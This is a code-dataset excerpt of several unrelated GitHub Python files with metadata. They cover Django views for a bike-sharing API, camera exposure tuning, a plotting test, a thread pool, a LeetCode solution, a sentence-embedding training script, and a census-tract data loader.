SocialAppSerializer\n\n def get_queryset(self):\n return SocialApp.objects.filter(sites__id=get_current_site(self.request).id)\n\n\nclass RSS20PaginatedFeed(Rss201rev2Feed):\n def add_root_elements(self, handler):\n super(Rss201rev2Feed, self).add_root_elements(handler)\n\n if self.feed[\"page\"] > 1:\n handler.addQuickElement(\n \"link\",\n \"\",\n {\n \"rel\": \"first\",\n \"href\": self.feed[\"feed_url\"],\n },\n )\n\n if self.feed[\"page\"] < self.feed[\"last_page\"]:\n handler.addQuickElement(\n \"link\",\n \"\",\n {\n \"rel\": \"last\",\n \"href\": (f\"{self.feed['feed_url']}?page={self.feed['last_page']}\"),\n },\n )\n\n if self.feed[\"page\"] > 1:\n handler.addQuickElement(\n \"link\",\n \"\",\n {\n \"rel\": \"previous\",\n \"href\": (f\"{self.feed['feed_url']}?page={self.feed['page'] - 1}\"),\n },\n )\n\n if self.feed[\"page\"] < self.feed[\"last_page\"]:\n handler.addQuickElement(\n \"link\",\n \"\",\n {\n \"rel\": \"next\",\n \"href\": (f\"{self.feed['feed_url']}?page={self.feed['page'] + 1}\"),\n },\n )\n\n\nclass LogEntryFeed(Feed):\n feed_type = RSS20PaginatedFeed\n\n def title(self):\n return f\"Maintenance Events of {preferences.BikeSharePreferences.system_name}\"\n\n def description(self):\n return self.title()\n\n def link(self):\n return reverse(\n \"admin:%s_%s_changelist\"\n % (CykelLogEntry._meta.app_label, CykelLogEntry._meta.model_name)\n )\n\n def get_entries(self, request):\n return CykelLogEntry.objects.order_by(\"-timestamp\").all()\n\n def get_object(self, request):\n page = int(request.GET.get(\"page\", 1))\n entries = self.get_entries(request)\n paginator = Paginator(entries, 25)\n return {\"page\": page, \"paginator\": paginator}\n\n def items(self, obj):\n return obj[\"paginator\"].get_page(obj[\"page\"])\n\n def feed_extra_kwargs(self, obj):\n context = super().feed_extra_kwargs(obj)\n context[\"page\"] = obj[\"page\"]\n context[\"last_page\"] = obj[\"paginator\"].num_pages\n return context\n\n def item_title(self, item):\n return item.display()\n\n def item_pubdate(self, item):\n return item.timestamp\n\n def item_updateddate(self, item):\n return item.timestamp\n\n def item_description(self, item):\n return self.item_title(item)\n\n def item_link(self, item):\n return reverse(\n \"admin:%s_%s_change\" % (item._meta.app_label, item._meta.model_name),\n args=[item.id],\n )\n\n\nclass FilteredLogEntryFeed(LogEntryFeed):\n def get_entries(self, request):\n return CykelLogEntry.objects.order_by(\"-timestamp\").all()\n\n\ndef custom_exception_handler(exc, context):\n response = exception_handler(exc, context)\n if response is None:\n return None\n\n headers = {}\n if isinstance(exc, exceptions.APIException):\n if getattr(exc, \"auth_header\", None):\n headers[\"WWW-Authenticate\"] = exc.auth_header\n\n errors = []\n if getattr(exc, \"detail\", None):\n if isinstance(exc.detail, list):\n errors.append({\"detail\": exc.detail})\n elif isinstance(exc.detail, dict):\n for key, value in exc.detail.items():\n if isinstance(value, list):\n for item in value:\n errors.append({\"detail\": item, \"source\": key})\n else:\n errors.append({\"detail\": value, \"source\": key})\n else:\n errors.append({\"detail\": exc.detail})\n else:\n errors.append({\"detail\": str(exc)})\n\n messages = []\n for item in errors:\n if getattr(item[\"detail\"], \"code\", None):\n item[\"code\"] = item[\"detail\"].code\n messages.append(item[\"detail\"])\n\n data = {\"errors\": errors, \"message\": \"\\n\".join(messages)}\n return Response(data, status=response.status_code, headers=headers)\n", "repo_name": "transportkollektiv/cykel", "sub_path": "api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 13786, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 80, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 46, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 46, "usage_type": "name"}, {"api_name": "bikesharing.models.Bike.objects.all", "line_number": 47, "usage_type": "call"}, {"api_name": "bikesharing.models.Bike.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Bike", "line_number": 47, "usage_type": "name"}, {"api_name": "serializers.BikeSerializer", "line_number": 48, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 51, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 51, "usage_type": "name"}, {"api_name": "bikesharing.models.Station.objects.all", "line_number": 52, "usage_type": "call"}, {"api_name": "bikesharing.models.Station.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Station", "line_number": 52, "usage_type": "name"}, {"api_name": "serializers.StationSerializer", "line_number": 53, "usage_type": "name"}, {"api_name": "rest_framework.permissions.BasePermission", "line_number": 56, "usage_type": "name"}, {"api_name": "rest_framework.permissions.SAFE_METHODS", "line_number": 65, "usage_type": "name"}, {"api_name": "rest_framework.permissions.BasePermission", "line_number": 71, "usage_type": "name"}, {"api_name": "rest_framework.mixins.CreateModelMixin", "line_number": 84, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 84, "usage_type": "name"}, {"api_name": "rest_framework.mixins.RetrieveModelMixin", "line_number": 85, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 85, "usage_type": "name"}, {"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 86, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 86, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 87, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 87, "usage_type": "name"}, {"api_name": "serializers.CreateRentSerializer", "line_number": 91, "usage_type": "name"}, {"api_name": "serializers.RentSerializer", "line_number": 93, "usage_type": "name"}, {"api_name": "bikesharing.models.Rent.objects.filter", "line_number": 97, "usage_type": "call"}, {"api_name": "bikesharing.models.Rent.objects", "line_number": 97, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Rent", "line_number": 97, "usage_type": "name"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 101, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 101, "usage_type": "name"}, {"api_name": "bikesharing.models.Bike.State", "line_number": 106, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Bike", "line_number": 106, "usage_type": "name"}, {"api_name": "cykel.models.CykelLogEntry.objects.create", "line_number": 111, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry.objects", "line_number": 111, "usage_type": "attribute"}, {"api_name": "cykel.models.CykelLogEntry", "line_number": 111, "usage_type": "name"}, {"api_name": "serializers.RentSerializer", "line_number": 118, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 120, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 121, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 121, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 132, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_403_PERMISSON_DENIED", "line_number": 134, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 134, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 137, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_410_GONE", "line_number": 138, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 138, "usage_type": "name"}, {"api_name": "bikesharing.models.Location.objects.create", "line_number": 143, "usage_type": "call"}, {"api_name": "bikesharing.models.Location.objects", "line_number": 143, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Location", "line_number": 143, "usage_type": "name"}, {"api_name": "bikesharing.models.Location.Source", "line_number": 145, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Location", "line_number": 145, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 146, "usage_type": "call"}, {"api_name": "django.contrib.gis.geos.Point", "line_number": 147, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 152, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 124, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 159, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_403_PERMISSON_DENIED", "line_number": 161, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 161, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 165, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_410_GONE", "line_number": 166, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 166, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 173, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 175, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 154, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 82, "usage_type": "call"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 82, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 183, "usage_type": "call"}, {"api_name": "bikesharing.models.LocationTracker.objects.get", "line_number": 185, "usage_type": "call"}, {"api_name": "bikesharing.models.LocationTracker.objects", "line_number": 185, "usage_type": "attribute"}, {"api_name": "bikesharing.models.LocationTracker", "line_number": 185, "usage_type": "name"}, {"api_name": "bikesharing.models.LocationTracker.DoesNotExist", "line_number": 186, "usage_type": "attribute"}, {"api_name": "bikesharing.models.LocationTracker", "line_number": 186, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 187, "usage_type": "call"}, {"api_name": "serializers.LocationTrackerUpdateSerializer", "line_number": 189, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 191, "usage_type": "call"}, {"api_name": "bikesharing.models.Location", "line_number": 201, "usage_type": "call"}, {"api_name": "bikesharing.models.Location.Source", "line_number": 202, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Location", "line_number": 202, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 203, "usage_type": "call"}, {"api_name": "django.contrib.gis.geos.Point", "line_number": 205, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 215, "usage_type": "call"}, {"api_name": "preferences.preferences.BikeSharePreferences", "line_number": 220, "usage_type": "attribute"}, {"api_name": "preferences.preferences", "line_number": 220, "usage_type": "name"}, {"api_name": "bikesharing.models.Station.objects.filter", "line_number": 221, "usage_type": "call"}, {"api_name": "bikesharing.models.Station.objects", "line_number": 221, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Station", "line_number": 221, "usage_type": "name"}, {"api_name": "django.contrib.gis.measure.D", "line_number": 222, "usage_type": "call"}, {"api_name": "bikesharing.models.Station.Status", "line_number": 223, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Station", "line_number": 223, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 232, "usage_type": "call"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 232, "usage_type": "call"}, {"api_name": "bikesharing.models.LocationTracker.Status", "line_number": 237, "usage_type": "attribute"}, {"api_name": "bikesharing.models.LocationTracker", "line_number": 237, "usage_type": "name"}, {"api_name": "cykel.models.CykelLogEntry.create_unless_time", "line_number": 239, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry", "line_number": 239, "usage_type": "name"}, {"api_name": "bikesharing.models.Bike.State", "line_number": 243, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Bike", "line_number": 243, "usage_type": "name"}, {"api_name": "cykel.models.CykelLogEntry.create_unless_time", "line_number": 245, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry", "line_number": 245, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 253, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 255, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 178, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 179, "usage_type": "call"}, {"api_name": "rest_framework_api_key.permissions.HasAPIKey", "line_number": 179, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ViewSet", "line_number": 262, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 262, "usage_type": "name"}, {"api_name": "bikesharing.models.Bike.objects.filter", "line_number": 265, "usage_type": "call"}, {"api_name": "bikesharing.models.Bike.objects", "line_number": 265, "usage_type": "attribute"}, {"api_name": "bikesharing.models.Bike", "line_number": 265, "usage_type": "name"}, {"api_name": "serializers.MaintenanceBikeSerializer", "line_number": 266, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 267, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 263, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 269, "usage_type": "call"}, {"api_name": "rest_framework.decorators.authentication_classes", "line_number": 258, "usage_type": "call"}, {"api_name": "rest_framework.authentication.SessionAuthentication", "line_number": 259, "usage_type": "name"}, {"api_name": "rest_framework.authentication.TokenAuthentication", "line_number": 259, "usage_type": "name"}, {"api_name": "authentication.BasicTokenAuthentication", "line_number": 259, "usage_type": "name"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 261, "usage_type": "call"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 261, "usage_type": "name"}, {"api_name": "rest_framework.generics.RetrieveAPIView", "line_number": 275, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 275, "usage_type": "name"}, {"api_name": "serializers.UserDetailsSerializer", "line_number": 282, "usage_type": "name"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 283, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 283, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 291, "usage_type": "call"}, {"api_name": "rest_framework.mixins.ListModelMixin", "line_number": 296, "usage_type": "attribute"}, {"api_name": "rest_framework.mixins", "line_number": 296, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 297, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 297, "usage_type": "name"}, {"api_name": "serializers.SocialAppSerializer", "line_number": 301, "usage_type": "name"}, {"api_name": "allauth.socialaccount.models.SocialApp.objects.filter", "line_number": 304, "usage_type": "call"}, {"api_name": "allauth.socialaccount.models.SocialApp.objects", "line_number": 304, "usage_type": "attribute"}, {"api_name": "allauth.socialaccount.models.SocialApp", "line_number": 304, "usage_type": "name"}, {"api_name": "django.contrib.sites.shortcuts.get_current_site", "line_number": 304, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 294, "usage_type": "call"}, {"api_name": "rest_framework.permissions.AllowAny", "line_number": 294, "usage_type": "name"}, {"api_name": "django.utils.feedgenerator.Rss201rev2Feed", "line_number": 307, "usage_type": "name"}, {"api_name": "django.utils.feedgenerator.Rss201rev2Feed", "line_number": 309, "usage_type": "argument"}, {"api_name": "django.contrib.syndication.views.Feed", "line_number": 352, "usage_type": "name"}, {"api_name": "preferences.preferences.BikeSharePreferences", "line_number": 356, "usage_type": "attribute"}, {"api_name": "preferences.preferences", "line_number": 356, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 362, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry._meta", "line_number": 364, "usage_type": "attribute"}, {"api_name": "cykel.models.CykelLogEntry", "line_number": 364, "usage_type": "name"}, {"api_name": "cykel.models.CykelLogEntry.objects.order_by", "line_number": 368, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry.objects", "line_number": 368, "usage_type": "attribute"}, {"api_name": "cykel.models.CykelLogEntry", "line_number": 368, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 373, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 398, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry.objects.order_by", "line_number": 406, "usage_type": "call"}, {"api_name": "cykel.models.CykelLogEntry.objects", "line_number": 406, "usage_type": "attribute"}, {"api_name": "cykel.models.CykelLogEntry", "line_number": 406, "usage_type": "name"}, {"api_name": "rest_framework.views.exception_handler", "line_number": 410, "usage_type": "call"}, {"api_name": "rest_framework.exceptions.APIException", "line_number": 415, "usage_type": "attribute"}, {"api_name": "rest_framework.exceptions", "line_number": 415, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 442, "usage_type": "call"}]}
+{"seq_id": "15514557452", "text": "import cv2 #Highly overkill I think\nfrom vimba import *\nfrom time import sleep\nimport numpy as np\nfrom PIL import Image \n\ndef take_image(cam_id, f_name): #Takes a singular picture with chosen camera and saves it as \".jpg\"\n with vimba.get_camera_by_id(cam_id) as cam:\n frame = cam.get_frame()\n frame.convert_pixel_format(PixelFormat.Mono8) #This sets the camera to use Mono8 (8-bit image [monochrome?])\n cv2.imwrite (f'{f_name}.jpg ', frame.as_opencv_image()) #Just a ludacrious way of storing the image? Seems like it\n #Ok, now lets assume this then just saves an image as a jpg\n\ndef find_exposure_time(initial_guess, cam_id): #Figures out the optimal exposure time, sets the camera to it and returns it\n exposure_time = initial_guess\n max_pixel = 256 #Just an initial value to make the while loop start\n img_name = 'for_exp_time'\n print('start')\n with vimba.get_camera_by_id(cam_id) as cam:\n increment = cam.ExposureTime.get_increment()\n while(np.abs(max_pixel-230) > 20): #Somewhat quick changes to get a fairly good exposure time\n if(max_pixel < 230): exposure_time = exposure_time + ((exposure_time*0.1)//increment)*increment #Increases exposure time ~10% but ensures that it is done in a whole number of increments\n elif(max_pixel > 230): exposure_time = exposure_time - ((exposure_time*0.1)//increment)*increment #Same as above, just lowering this time\n cam.ExposureTime.set(exposure_time)\n take_image(cam_id, img_name)\n pixel_values = np.asarray(Image.open(f'{img_name}.jpg'))\n max_pixel = np.max(pixel_values)\n print(f'rough time found: {exposure_time}')\n\n if(max_pixel < 230): #Slow and incremental changes to exposure time, so we can find the optimal one\n tmp_max_pixel = max_pixel + 1\n while(tmp_max_pixel > max_pixel and tmp_max_pixel <= 230):\n exposure_time += 1\n cam.ExposureTime.set(exposure_time)\n take_image(cam_id, img_name)\n pixel_values = np.asarray(Image.open(f'{img_name}.jpg'))\n max_pixel = np.max(pixel_values)\n exposure_time -= 1\n elif(max_pixel > 230):\n tmp_max_pixel = max_pixel - 1\n while(max_pixel > 230 and tmp_max_pixel >= 230):\n exposure_time -= 1\n cam.ExposureTime.set(exposure_time)\n take_image(cam_id, img_name)\n pixel_values = np.asarray(Image.open(f'{img_name}.jpg'))\n max_pixel = np.max(pixel_values)\n exposure_time += 1\n print(f'Optimal time found: {exposure_time}')\n cam.ExposureTime.set(exposure_time)\n return(exposure_time)\n\n\ndef main():\n with Vimba.get_instance() as vimba:\n front_camera_id = 'djlefakjlkjd' #The IDs are just placeholders as I do not know the actual IDs\n top_camera_id = 'klajsflsaj'\n\n for i in range(10): #just to check that nothing fucked happens (within a minute at least).\n print(f'test {i}: front camera is {front_camera} and top camera is {top_camera}')\n sleep(6)\n take_image(front_camera, 'test') #Takes a test image with the front camera\n\nif __name__ == '__main__':\n main()\n", "repo_name": "CThyness/Nanophotonics_II", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 3288, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "vimba.get_camera_by_id", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 11, "usage_type": "call"}, {"api_name": "vimba.get_camera_by_id", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 26, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 36, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 36, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 36, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 45, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 45, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 45, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 46, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 60, "usage_type": "call"}]}
+{"seq_id": "19653485599", "text": "import os\nfrom unittest import mock\n\nimport numpy as np\nimport pytest\n\n\ndef test_add_coastlines_help():\n from polar2grid.add_coastlines import main\n\n with pytest.raises(SystemExit) as e:\n main([\"--help\"])\n assert e.value.code == 0\n\n\ndef _create_fake_l_geotiff(fp):\n import rasterio\n\n kwargs = {\n \"driver\": \"GTiff\",\n \"height\": 1000,\n \"width\": 500,\n \"count\": 1,\n \"dtype\": np.uint8,\n \"crs\": \"+proj=latlong\",\n \"transform\": (0.033, 0.0, 0.0, 0.0, 0.033, 0.0),\n }\n with rasterio.open(fp, \"w\", **kwargs) as ds:\n ds.write(np.zeros((500, 1000), dtype=np.uint8), 1)\n\n\n@mock.patch(\"polar2grid.add_coastlines.ContourWriterAGG.add_overlay_from_dict\")\ndef test_add_coastlines_basic_l(add_overlay_mock, tmp_path):\n from polar2grid.add_coastlines import main\n\n fp = str(tmp_path / \"test.tif\")\n _create_fake_l_geotiff(fp)\n ret = main([\"--add-coastlines\", \"--add-colorbar\", fp])\n assert ret in [None, 0]\n assert os.path.isfile(tmp_path / \"test.png\")\n add_overlay_mock.assert_called_once()\n assert \"coasts\" in add_overlay_mock.call_args.args[0]\n", "repo_name": "cloudsillusions/polar2grid", "sub_path": "polar2grid/tests/test_add_coastlines.py", "file_name": "test_add_coastlines.py", "file_ext": "py", "file_size_in_byte": 1134, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytest.raises", "line_number": 11, "usage_type": "call"}, {"api_name": "polar2grid.add_coastlines.main", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 24, "usage_type": "attribute"}, {"api_name": "rasterio.open", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 29, "usage_type": "attribute"}, {"api_name": "polar2grid.add_coastlines.main", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "unittest.mock.patch", "line_number": 32, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 32, "usage_type": "name"}]}
+{"seq_id": "39270921333", "text": "import threading\nfrom collections.abc import Callable\nfrom queue import Queue, Empty\nfrom typing import NamedTuple, Any\n\n\nclass QueueItem(NamedTuple):\n func: Callable\n arg: Any\n\n\nclass ThreadPool:\n def __init__(self, num_threads: int):\n self.input: Queue[QueueItem] = Queue()\n self.output = Queue()\n self.running = True\n self.input_count = 0\n self.processing_count = 0\n self.output_count = 0\n self.count_lock = threading.Lock()\n\n self.threads = [threading.Thread(target=self.consumer) for _ in range(num_threads)]\n for t in self.threads:\n t.start()\n\n def __repr__(self):\n return f'ThreadPool(input_count={self.input_count}, processing_count={self.processing_count}, output_count={self.output_count})'\n\n def __len__(self):\n with self.count_lock:\n return self.input_count + self.processing_count + self.output_count\n\n def __iter__(self):\n while len(self) > 0 and self.running:\n try:\n out = self.output.get(block=True, timeout=1)\n self.output.task_done()\n with self.count_lock:\n self.output_count -= 1\n yield out\n except Empty:\n pass\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.join()\n\n def join(self):\n self.input.join()\n self.running = False\n for t in self.threads:\n t.join()\n\n def add_item(self, func, arg):\n self.input.put(QueueItem(func, arg))\n with self.count_lock:\n self.input_count += 1\n\n def get_item(self):\n out = self.output.get()\n self.output.task_done()\n with self.count_lock:\n self.output_count -= 1\n return out\n\n def consumer(self):\n while self.running:\n try:\n item = self.input.get(block=True, timeout=1)\n with self.count_lock:\n self.input_count -= 1\n self.processing_count += 1\n self.output.put(item.func(item.arg))\n self.input.task_done()\n with self.count_lock:\n self.processing_count -= 1\n self.output_count += 1\n except Empty:\n pass\n", "repo_name": "KathrynPanger/bbd", "sub_path": "src/bbd/github_data_extractor/threadpool.py", "file_name": "threadpool.py", "file_ext": "py", "file_size_in_byte": 2360, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.NamedTuple", "line_number": 7, "usage_type": "name"}, {"api_name": "collections.abc.Callable", "line_number": 8, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 9, "usage_type": "name"}, {"api_name": "queue.Queue", "line_number": 14, "usage_type": "name"}, {"api_name": "queue.Queue", "line_number": 15, "usage_type": "call"}, {"api_name": "threading.Lock", "line_number": 20, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 22, "usage_type": "call"}, {"api_name": "queue.Empty", "line_number": 41, "usage_type": "name"}, {"api_name": "queue.Empty", "line_number": 80, "usage_type": "name"}]}
+{"seq_id": "73982554729", "text": "#\n# @lc app=leetcode id=2218 lang=python3\n#\n# [2218] Maximum Value of K Coins From Piles\n#\n\n# @lc code=start\nfrom functools import cache\nfrom typing import List\n\n\nclass Solution:\n def maxValueOfCoins(self, piles: List[List[int]], k: int) -> int:\n @cache\n def dp(i, coin_to_collect):\n '''\n @param:\n i : choose only the pile starting from i \n '''\n if i == len(piles) or coin_to_collect == 0:\n return 0\n ret, curr = dp(i+1, coin_to_collect), 0\n\n for _i, x in enumerate(piles[i]):\n if coin_to_collect-1-_i < 0:\n break\n curr += x\n ret = max(dp(i+1, coin_to_collect-(_i + 1)) + curr, ret)\n return ret\n return dp(0, k)\n\n# @lc code=end\n", "repo_name": "benntuecon/Leetcode-prac", "sub_path": "2218.maximum-value-of-k-coins-from-piles.py", "file_name": "2218.maximum-value-of-k-coins-from-piles.py", "file_ext": "py", "file_size_in_byte": 824, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.List", "line_number": 13, "usage_type": "name"}, {"api_name": "functools.cache", "line_number": 14, "usage_type": "name"}]}
+{"seq_id": "42185950529", "text": "import os\r\n# os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\r\nimport sys\r\nsys.path.append(\"D:/Meredith/TaskB\")\r\nimport csv\r\nimport gzip\r\nimport xml.dom.minidom\r\nimport math\r\nfrom datetime import datetime\r\nfrom torch.utils.data import DataLoader\r\n\r\nfrom sklearn.metrics.pairwise import paired_cosine_distances\r\n# from datasets import load_dataset\r\nfrom transformers import AutoTokenizer,AutoModel,BertConfig,BertModel\r\nimport numpy as np\r\n\r\nfrom transformers.models.bert import BertTokenizer\r\nfrom transformers import AdamW,get_linear_schedule_with_warmup\r\n\r\n# from sentence_transformers.evaluation import EmbeddingSimilarityEvaluator\r\nfrom typing import Union, Tuple, List, Iterable, Dict, Callable\r\nfrom data_CoSENT import load_ENdata,load_PTdata,CustomDataset,collate_fn,pad_to_maxlen\r\n\r\nfrom utils import evaluate,get_similarity,prepare_data,get_devSimilarity,write_csv,evaluate_submission,insert_to_submission1,writeList_csv,set_seed\r\nfrom torch import nn\r\n\r\n# from transformers import InputExample\r\nfrom torch.utils.data import Dataset\r\nimport random\r\nimport torch\r\nimport argparse\r\n\r\n#本部分来自https://github.com/shawroad/CoSENT_Pytorch\r\ndef calc_loss(y_true,y_pred):\r\n #取出真实标签\r\n y_true=y_true[::2]\r\n #对输出的句子向量进行l2归一化 后面只需要对应位相乘就可以得到cos值\r\n norms=(y_pred**2).sum(axis=1,keepdims=True)**0.5\r\n y_pred=y_pred/norms\r\n #奇偶向量相乘\r\n y_pred=torch.sum(y_pred[::2]*y_pred[1::2],dim=1)*20\r\n y_1=y_pred[:,None]\r\n y_2=y_pred[None,:]\r\n y_pred=y_1-y_2#两两之间的余弦差值\r\n #矩阵中的第i行第j列 表示的是第i个余弦值-第j个余弦值\r\n y_true=y_true[:,None] load it and return its content\r\n if os.path.exists(cachefile):\r\n with open(cachefile, 'rb') as cachehandle:\r\n print(\"using cached result from '%s'\" % cachefile)\r\n return pickle.load(cachehandle)\r\n\r\n # execute the function with all arguments passed\r\n res = fn(*args, **kwargs)\r\n\r\n # write to cache file\r\n with open(cachefile, 'wb') as cachehandle:\r\n print(\"saving result to cache '%s'\" % cachefile)\r\n pickle.dump(res, cachehandle)\r\n\r\n return res\r\n\r\n return wrapped\r\n\r\n return decorator # return this \"customized\" decorator that uses \"cachefile\"\r\n\r\n@cached('tracts_disparity.pickle')\r\ndef load_data():\r\n lfe = pd.read_csv('data/US_A.CSV')[['Tract ID', 'e(0)']] \\\r\n .rename(index=str, \r\n columns={'Tract ID': 'GEOID', \r\n 'e(0)':'life_expectancy'})\r\n lfe['GEOID'] = lfe['GEOID'].astype(str)\r\n gdf = gpd.read_file('data/geo/tracts/usa_tracts.shp')[['GEOID','geometry']]\r\n gdf = gdf.merge(lfe).set_index('GEOID')\r\n\r\n swm = ps.weights.Rook.from_dataframe(gdf)\r\n tract_to_neighbors = swm.neighbors\r\n\r\n fips_to_lfe = dict(zip(lfe['GEOID'].astype(str), lfe['life_expectancy']))\r\n\r\n g = nx.Graph()\r\n g.add_nodes_from(gdf.index)\r\n\r\n for tract, neighbors in tract_to_neighbors.items():\r\n avail_tracts = fips_to_lfe.keys()\r\n # some tracts don't seem to show up in the life expectancy dataset\r\n # these may be tracts with no population\r\n if tract in avail_tracts:\r\n for neighbor in neighbors:\r\n if neighbor in avail_tracts:\r\n tract_lfe = fips_to_lfe[tract]\r\n 